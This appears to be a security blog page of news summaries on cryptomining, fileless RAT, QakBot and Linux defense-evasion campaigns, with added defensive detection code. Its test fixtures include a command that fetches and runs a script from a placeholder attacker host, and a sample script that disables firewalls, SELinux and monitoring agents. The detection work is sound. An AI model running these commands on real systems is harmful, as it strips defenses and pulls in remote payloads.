Showing posts with label Evasive Techniques.

Autom Cryptomining Malware Employs Upgraded Evasion Techniques

 

The Autom cryptomining campaign has upgraded its toolset and added new defense evasion methods that let the attackers stay under the radar of anti-virus scanning tools.

According to researchers at DevSecOps and cloud security firm Aqua Security, the campaign was first identified in 2019, and since then a total of 84 attacks against the researchers' honeypot servers have been recorded, four of them in 2021.

Early attacks in this campaign involved running a malicious command once a user started a vanilla image named "alpine:latest". That command resulted in a shell script named "autom.sh" being downloaded onto the host.

"Adversaries commonly use vanilla images along with malicious commands to perform their attacks, because most organizations trust the official images and allow their use," the researchers explained in a blog post. "Over the years, the malicious command that was added to the official image to carry out the attack has barely changed. The main difference is the server from which the shell script autom.sh was downloaded."

The shell script kicks off the attack sequence: it creates a new user account named "akay" and then grants that account root privileges, enabling the attackers to run arbitrary commands on the compromised machine and, eventually, abuse its resources to mine cryptocurrency. The early 2019 versions made no special effort to hide the mining activity, but the later versions show the lengths the developers have gone to in order to keep it hidden from scanning tools.

Campaigns that hijack computers to mine cryptocurrency have been dominated by a handful of threat actors such as Kinsing, which has been spotted scanning the internet for misconfigured Docker servers, breaking into the unguarded hosts and installing a previously undocumented coin miner strain.

"Miners are a low-risk way for cybercriminals to turn a vulnerability into digital cash, with the greatest risk to their cash flow being competing miners discovering the same vulnerable servers," Sophos senior threat researcher Sean Gallagher explained in an analysis of a Tor2Mine mining campaign, which involves the use of a PowerShell script to disable malware protection, execute a miner payload, and harvest Windows credentials.
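Two of the observables described above (an official base image started with a command that fetches a script and pipes it into a shell, and an added account that has been given root) can be checked from the defender's side. The following is an added example written for this post, not code from Aqua Security; the `docker inspect`-shaped JSON and the `/etc/passwd` excerpt are constructed, the `attacker.example` host is a placeholder, and the assumption that the "akay" account was given UID 0 is mine (the post only says its privileges were raised to root).

```python
import json
import re

# Constructed sample in the shape of `docker inspect` output, trimmed to the
# two fields this check reads (Config.Image and Config.Cmd). Not real data.
SAMPLE_INSPECT = json.dumps([
    {"Id": "c1", "Config": {"Image": "alpine:latest",
                            "Cmd": ["sh", "-c", "curl -s http://attacker.example/autom.sh | sh"]}},
    {"Id": "c2", "Config": {"Image": "alpine:latest",
                            "Cmd": ["/bin/sh"]}},
    {"Id": "c3", "Config": {"Image": "nginx:latest",
                            "Cmd": ["nginx", "-g", "daemon off;"]}},
])

# Official (library) images have no namespace prefix, e.g. "alpine:latest".
# Fully qualified names such as docker.io/library/alpine are not covered here.
OFFICIAL_IMAGE = re.compile(r"^[a-z0-9]+(?:[._-][a-z0-9]+)*(?::[\w.-]+)?$")
# A download piped straight into a shell inside the container command.
FETCH_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:ba|da|a)?sh\b")


def suspicious_containers(inspect_json: str) -> list:
    """Return ids of containers that run an official base image with a
    command that fetches a remote script and pipes it into a shell."""
    flagged = []
    for container in json.loads(inspect_json):
        cfg = container.get("Config", {})
        image = cfg.get("Image", "")
        cmd = " ".join(cfg.get("Cmd") or [])
        if OFFICIAL_IMAGE.match(image) and FETCH_TO_SHELL.search(cmd):
            flagged.append(container["Id"])
    return flagged


# Constructed /etc/passwd excerpt. Assumption: the added account was given
# UID 0, which is one common way of turning a new user into root.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
akay:x:0:0::/home/akay:/bin/sh
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""


def extra_uid0_accounts(passwd_text: str) -> list:
    """Return account names other than root whose UID field is 0."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            hits.append(fields[0])
    return hits


if __name__ == "__main__":
    print("suspicious containers:", suspicious_containers(SAMPLE_INSPECT))
    print("extra uid-0 accounts:", extra_uid0_accounts(SAMPLE_PASSWD))
```

On a real host the first function would be fed the output of `docker inspect $(docker ps -q)` and the second the contents of `/etc/passwd`; both are cheap enough to run from a cron job or an osquery-style scheduled query.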

Novel Fileless Malware Uses Windows Registry as Storage to Bypass Detection

 

Cybersecurity researchers from Prevailion's Adversarial Counterintelligence Team (PACT) have unearthed new fileless malware dubbed DarkWatchman, propagated via a social engineering campaign.

The RAT is designed to evade detection and analysis and could therefore easily be employed in ransomware operations. DarkWatchman uses a complex domain generation algorithm (DGA) to locate its command-and-control (C2) infrastructure and abuses the Windows Registry as its storage.

The malware "utilizes novel methods for fileless persistence, on-system activity, and dynamic run-time capabilities like self-updating and recompilation," researchers Matt Stafford and Sherman Smith stated. 

"It represents an evolution in fileless malware techniques, as it uses the registry for nearly all temporary and permanent storage and therefore never writes anything to disk, allowing it to operate beneath or around the detection threshold of most security tools."

According to the researchers, the RAT began operating in November and abused multiple known TLS certificates. Given its backdoor and persistence features, the researchers believe DarkWatchman could be an "initial access and reconnaissance tool" used by ransomware groups.

Ransomware operators typically rely on other attackers to manage the persistence and wide distribution of their programs. Fileless malware with such detection-evading techniques gives the ransomware developers more oversight of the operation than just negotiating ransoms.

The novel RAT consists of a fileless JavaScript RAT and a C#-based keylogger, the latter of which is stored in the registry to avoid detection. Both components are extremely lightweight: the malicious JavaScript code is only about 32 KB, while the keylogger is a mere 8.5 KB.

"The storage of the binary in the registry as encoded text means that DarkWatchman is persistent yet its executable is never (permanently) written to disk; it also means that DarkWatchman's operators can update (or replace) the malware every time it's executed," the researchers said. 

Once installed, the malware can execute arbitrary binaries, load DLL files, run JavaScript code and PowerShell commands, upload files to a remote server, update itself, and even uninstall the RAT and keylogger from the compromised device. The JavaScript routine is also responsible for establishing persistence by creating a scheduled task that runs the malware at every user logon.

"It would appear that the authors of DarkWatchman identified and took advantage of the complexity and opacity of the Windows Registry to work underneath or around the detection threshold of security tools and analysts alike," the researchers concluded. "Registry changes are commonplace, and it can be difficult to identify which changes are anomalous or outside the scope of normal OS and software functions."
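The researchers' point that registry changes are hard to triage can be narrowed down: a payload stored "as encoded text" has to live in a value that is far larger and far more random-looking than ordinary configuration strings. The following is an added example for this post, not Prevailion's tooling. It scans a `.reg`-style export for long, high-entropy string values. The export text is constructed, the key names are invented, the blob is deterministic pseudo-random filler rather than any real sample, and the parser only handles single-line `"name"="string"` values (real exports also carry `hex:` data and line continuations, which are ignored here).

```python
import base64
import hashlib
import math
import re


def _pseudo_random_bytes(n: int) -> bytes:
    """Deterministic filler standing in for an encoded binary (constructed)."""
    out = bytearray()
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(b"sample-blob" + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:n])


# Constructed .reg-style export; the vendor/key names are made up.
SAMPLE_REG_EXPORT = (
    "Windows Registry Editor Version 5.00\n"
    "\n"
    "[HKEY_CURRENT_USER\\Software\\ExampleApp]\n"
    '"InstallPath"="C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\ExampleApp"\n'
    '"Language"="en-US"\n'
    "\n"
    "[HKEY_CURRENT_USER\\Software\\ExampleVendor\\Cache]\n"
    '"Blob"="' + base64.b64encode(_pseudo_random_bytes(9000)).decode() + '"\n'
)

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')


def shannon_entropy(s: str) -> float:
    """Bits per character; ~6.0 for base64 of random data, ~4.5 for English."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def find_blob_values(reg_text: str, min_len: int = 4096, min_entropy: float = 5.0) -> list:
    """Return (key, value_name, length, entropy) for string values that are
    both unusually long and high-entropy, which is what an encoded executable
    parked in the registry looks like."""
    findings = []
    key = None
    for line in reg_text.splitlines():
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if not m or key is None:
            continue
        name, data = m.group(1), m.group(2)
        if len(data) >= min_len:
            ent = shannon_entropy(data)
            if ent >= min_entropy:
                findings.append((key, name, len(data), round(ent, 2)))
    return findings


if __name__ == "__main__":
    for finding in find_blob_values(SAMPLE_REG_EXPORT):
        print(finding)
```

The thresholds are deliberately loose (4 KB is well under the 8.5 KB keylogger size quoted above); the useful signal is the combination of size and entropy, since long but low-entropy values such as file lists are common and harmless.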

QakBot (QBot) Campaign: A Thorough Analysis



The banking trojan QakBot, also known as QBot, QuackBot and Pinkslipbot, is a modular information stealer that has been active for almost 14 years. With the primary goal of stealing banking credentials, QakBot employs various tools to evade detection and hamper manual analysis. Its authors have built the trojan with enough sophistication that its variants can deploy additional malware, open a backdoor into infected systems, and log user keystrokes.

QakBot attacks typically deliver MS Office Word documents via phishing emails crafted to trick the user into opening them. In 2020, however, some QakBot campaigns used ZIP attachments enclosing a Word document that carried the macros. These macros are configured to trigger a PowerShell script that then downloads the QBot payload from selected internet addresses.

Spoofing the Victim: Opening the QBot-Infected Word Doc

When the victim opens the Word document carrying the malicious macro, Word displays a yellow "Security Warning" bar directly below the ribbon asking the user to click "Enable Content". Once the user clicks it, a gray dialog box reading "Loading data. Please wait..." appears, giving the impression that the document is simply taking its time to load.

Behind the scenes, however, the malicious macro is executing. As part of the process, the macro creates a folder into which it attempts to download the QakBot payload, which is hosted in five different places. From the five corresponding URLs it can be concluded that they were all built with the same website builder, which possibly has a flaw that lets EXE files be uploaded with a PNG extension.
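An executable served with a `.png` extension is easy to catch at the boundary, because the file's leading bytes give it away regardless of its name. The following is an added example for this post, not code from the analysis it summarizes: it identifies a file by its magic bytes (PNG signature versus an `MZ` DOS header pointing at a `PE\0\0` signature) and flags downloads whose extension disagrees with their content. The PNG header and the minimal PE stub are constructed inline.

```python
import struct

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def sniff(data: bytes) -> str:
    """Identify a file by its leading bytes: 'png', 'pe', 'dos-executable' or 'unknown'."""
    if data.startswith(PNG_MAGIC):
        return "png"
    if data[:2] == b"MZ" and len(data) >= 0x40:
        # The DOS header stores the offset of the PE header (e_lfanew) at 0x3C.
        pe_off = struct.unpack_from("<I", data, 0x3C)[0]
        if data[pe_off:pe_off + 4] == b"PE\0\0":
            return "pe"
        return "dos-executable"
    return "unknown"


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the name claims .png but the content is a Windows executable."""
    return filename.lower().endswith(".png") and sniff(data) in ("pe", "dos-executable")


def flag_downloads(files: dict) -> list:
    """files maps filename -> bytes; return the names whose extension lies."""
    return [name for name, data in files.items() if extension_mismatch(name, data)]


# Constructed samples: a minimal PNG header and a minimal fake PE stub.
SAMPLE_PNG = PNG_MAGIC + b"\x00\x00\x00\rIHDR" + b"\x00" * 17


def _fake_pe() -> bytes:
    header = bytearray(b"MZ" + b"\x00" * 0x3E)        # 0x40-byte DOS header
    struct.pack_into("<I", header, 0x3C, 0x40)        # e_lfanew -> 0x40
    return bytes(header) + b"PE\0\0" + b"\x00" * 20   # PE signature + padding


SAMPLE_FAKE_PE = _fake_pe()


if __name__ == "__main__":
    print(flag_downloads({"logo.png": SAMPLE_PNG, "image.png": SAMPLE_FAKE_PE}))
```

The same check belongs in a web proxy or mail gateway as a content-type rule: a response labelled `image/png` whose body starts with `MZ` is exactly the mismatch described above.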

In one of its previous campaigns, QBot on execution replaced its original binary with a copy of the Windows Calculator app (calc.exe). It then scanned the installed programs, compared process names against a blacklist, examined registry entries and inspected hardware details to look for virtualization software such as VMware or VirtualBox. If QBot does not detect virtualization software, it copies the legitimate executable into a folder, disguising it with a valid signed certificate. After putting the executable in place, QBot schedules a task to run it every 5 hours. Once that execution completes, QBot launches an explorer.exe process and injects its code into that process's memory. QBot can also spawn additional processes using a double-process mechanism.

To safeguard against the ever-evolving QakBot threat, experts recommend that organizations train their employees, who can provide an alternative line of defense when automated intrusion detection fails.

Malicious Linux Shell Scripts Used to Evade Defenses

 

Attackers' evasion methods date back to the days when base64 and other popular encoding schemes were used.

Today, attackers use new Linux shell-script techniques to disable firewalls and monitoring agents and to change access control lists (ACLs). The common evasive shell-script techniques are:

1. Uninstalling monitoring agents
Monitoring agents are software components that continuously track a system's process and network activity. They also produce various logs, which are useful during an incident investigation.

The malicious script, discovered in the osquery-based sandbox, attempts to uninstall the cloud-related monitoring agent Aegis (Alibaba Cloud's threat detection agent) and terminate the Aliyun service. It also tries to uninstall YunJing, a host security agent from Tencent, and the BCM client management agent, which is generally installed on endpoints for risk mitigation.

2. Disabling Firewalls and Interrupts
As a defensive measure, most systems and servers employ firewalls. As a defense evasion technique, the malicious script attempts to deactivate the firewall, i.e., the Uncomplicated Firewall (ufw). In addition, the attackers flush the iptables rules (iptables -F), which are commonly used on Linux computers and servers to control firewall behavior.

The attackers also used commands to disable the non-maskable interrupt (NMI) watchdog. A watchdog is a configurable timer that raises an interrupt when a certain condition and time are met; in the case of a system freeze, the NMI watchdog interrupt handler stops the process that caused it. To get around this defense, attackers disable the watchdog feature using the sysctl command, or temporarily disable it by setting its value to '0'.

3. Disabling Linux Security Modules (LSMs)
The malicious shell script also disables security components such as SELinux and AppArmor. These modules are used to enforce mandatory access control (MAC) policies, and a server administrator can easily configure them to give users restricted access to the programs installed or running on the system.

- AppArmor: AppArmor is a Linux security feature that lets users confine applications such as Firefox for added protection. In Ubuntu's default setup, a user can restrict a program by granting it only limited permissions.

- SELinux: SELinux is a Linux security feature that allows a security administrator to apply security contexts to particular applications and services. Because it blocks or restricts the shell on many web servers, RCE (remote code execution) attackers generally try to bypass or disable it.

4. Modifying ACLs
ACLs, or access control lists, hold the rules for granting rights to files and utilities. Filesystem ACLs tell the operating system which users are authorized to access the system and what rights they possess. In Linux, the setfacl program is used to change and remove ACLs.

5. Changing Attributes
In Linux, chattr is used to set and unset various attributes of a file. Attackers use it to protect their dropped files, or to make them immutable so that a user cannot delete them.

6. Renaming common utilities
In one of the malicious scripts, common utilities such as wget and curl were used under different names. These programs are often used to fetch files from a remote IP address, and attackers use them to download malicious files from their C2 servers.

If wget and curl run under different names, security systems that match on the exact names of the utilities may not trigger on the download event.
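The six techniques above are individually unremarkable (an administrator may legitimately flush iptables or set an immutable bit), but a single script that does several of them is not. The following is an added example for this post and is not Uptycs' detection logic: it classifies each line of a shell script against one pattern per category and reports how many distinct categories are present. The patterns are my own approximations of the behaviour described above, and the sample script is constructed for the test, with benign lines mixed in so the classifier has something to ignore.

```python
import re

# One regex per evasion category described above. These are assumed patterns
# written for this example, not a vendor's signatures.
EVASION_PATTERNS = {
    # an agent name plus a stop/uninstall verb anywhere on the same line
    "uninstall_monitoring_agent": re.compile(
        r"(?=.*\b(?:uninstall|stop|kill|pkill|disable)\b)"
        r"(?=.*\b(?:aegis|aliyun|yunjing|bcm)\b)", re.I),
    "disable_firewall_or_watchdog": re.compile(
        r"\bufw\s+disable\b|\biptables\s+(?:-F|--flush)\b|nmi_watchdog\s*=\s*0", re.I),
    "disable_lsm": re.compile(
        r"\bsetenforce\s+0\b|SELINUX\s*=\s*disabled|\b(?:stop|disable)\s+apparmor\b", re.I),
    "modify_acl": re.compile(r"\bsetfacl\b"),
    "change_attributes": re.compile(r"\bchattr\b"),
    # copying/moving/linking wget or curl to some other name
    "rename_download_utility": re.compile(
        r"\b(?:cp|mv|ln)\b(?:\s+-\w+)*\s+(?:\S*/)?(?:wget|curl)\s+\S+"),
}

# Constructed sample for exercising the classifier; not a real malware script.
SAMPLE_SCRIPT = """\
#!/bin/sh
# constructed sample for testing the classifier
echo "starting"
/usr/local/aegis/uninstall.sh
systemctl stop aliyun.service
ufw disable
iptables -F
sysctl -w kernel.nmi_watchdog=0
setenforce 0
systemctl stop apparmor
setfacl -m u:nobody:rwx /tmp/work
chattr +i /tmp/work/payload
cp /usr/bin/wget /tmp/.w
apt-get install -y tar
echo "done"
"""


def classify_script(text: str) -> dict:
    """Map each evasion category to the (line number, line) pairs that match.
    Blank lines and comments are skipped."""
    hits = {category: [] for category in EVASION_PATTERNS}
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for category, pattern in EVASION_PATTERNS.items():
            if pattern.search(stripped):
                hits[category].append((lineno, stripped))
    return hits


def evasion_score(hits: dict) -> int:
    """Number of distinct categories seen (0..6). Two or more in one script is
    already unusual for a legitimate installer."""
    return sum(1 for matches in hits.values() if matches)


if __name__ == "__main__":
    result = classify_script(SAMPLE_SCRIPT)
    for category, matches in result.items():
        for lineno, line in matches:
            print(f"{category:30s} line {lineno}: {line}")
    print("score:", evasion_score(result))
```

The score, rather than any single hit, is what is worth alerting on; the per-line output is there so an analyst can see which statements contributed.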

- EDR Detections by Uptycs
Uptycs EDR flagged these malicious scripts with a threat score of 10/10 using YARA process scanning.

As attackers adopt newer and more complex evasion techniques, it is more vital than ever to track and document what is happening on the system. Threatpost recommends the following:

- Regularly monitor the suspicious processes, events and network traffic that result from the execution of any untrusted binary.
- Keep your systems and firmware up to date with the latest patches and releases.